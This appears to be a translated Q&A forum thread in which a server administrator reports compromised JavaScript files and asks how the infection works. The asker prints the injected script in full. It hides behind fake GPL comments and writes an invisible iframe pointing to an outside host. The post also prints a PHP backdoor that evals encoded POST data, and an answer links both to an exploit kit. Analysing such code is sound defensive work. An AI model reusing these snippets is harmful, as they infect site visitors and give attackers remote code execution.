- - - - 编辑 - - - - -
我不同意这是链接问题的重复。我知道处理此问题的正确方法是清除并重新安装服务器。但是,我对这个特定漏洞的内部工作原理很感兴趣,如果有人能帮助我提供一些提示,我仍然很高兴。
我正在尝试找出木马病毒是如何进入我的服务器的,到目前为止还没有成功,以及它到底想达到什么目的。我尝试了几种恶意软件扫描程序和防病毒解决方案来获取有关此病毒的一些详细信息,但它们都无法检测到。但是,我的服务器上的许多 js 文件都被修改并注入了以下代码片段:
/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function getCookie(name) {
/*
Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the original
licensor to copy, distribute or modify the Program subject to these
terms and conditions. You may not impose any further restrictions on the
recipients' exercise of the rights granted herein.
*/
var resizegood = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return resizegood ? decodeURIComponent(resizegood[1]) : undefined;
}
function Lightebrothermind() {
var Litresbool = navigator.userAgent;
var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbool.indexOf("Windows") < +1);
var assa_a = (getCookie("ultras17broser") === undefined);
/*The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.*/
if (!Smiledbob && assa_a) {
document.write('<iframe src="http://bablastules.vila.com.ar/htrsjdrjfgerhrdtjytd16.html" width="200" height="200" style="top: -901px;background-color: rgb(255,0,255);position: absolute;text-align: left;font-family: "Times New Roman", Georgia, Serif;left: -901px;height: 100px;width: 100px;"></iframe>');
var date = new Date( new Date().getTime() + 65*60*60*1000 );
document.cookie="ultras17broser=1; path=/; expires="+date.toUTCString();
/*
Each version is given a distinguishing version number. If the Program
specifies a version number of the license which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
the license, you may choose any version ever published by the Free Software
Foundation.
*/
}
}
Lightebrothermind();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
我对其中一个修改后的 js 文件进行了审核,结果如下:
type=PATH msg=audit(1410282146.532:1496): item=0 name="/PATH/TO/myfile.js" inode=1628304 dev=fd:00 mode=0100664 ouid=10007 ogid=2001 rdev=00:00
type=CWD msg=audit(1410282146.532:1496): cwd="/PATH/TO/"
type=SYSCALL msg=audit(1410282146.532:1496): arch=c000003e syscall=2 success=yes exit=60 a0=7fcf4646ca88 a1=241 a2=1b6 a3=692f736a2f756162 items=1 ppid=26429 pid=26769 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="apache2" exe="/usr/lib/apache2/mpm-prefork/apache2" key=(null)
当我切换到根据审核包含修改文件的文件夹时,我发现一个 php 文件,其文件名似乎是随机生成的,内容如下:
<?php
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
在我看来,这就像一个后门。但奇怪的是,该文件不可执行 (664),当我修改它以将注入的代码写入文本文件时,什么也没发生。
那么我该从哪里开始解决这个问题呢?我真的很高兴得到任何意见,因为我真的开始抓狂了。
哦,当我在文件中搜索代码时,我发现很多类似的文件,它们遍布我服务器上的 Web 文件夹。当我关闭 Apache 时,文件修改就停止了。我怀疑该木马是通过 Wordpress 插件进入我们服务器的,据说该插件存在漏洞,为攻击者提供了漏洞。
非常感谢,我很乐意提供任何所需的进一步信息。
答案1
您分享的代码与 Nuclear Exploit 工具包有关。其中的代码将继续在您服务器上的所有页面中注入 iframe。最好清除网站并从备份重新启动。您提到的后门也与针对 CMS 漏洞的攻击有关。我是一名恶意软件研究人员,如果您需要,我愿意帮助您清理系统。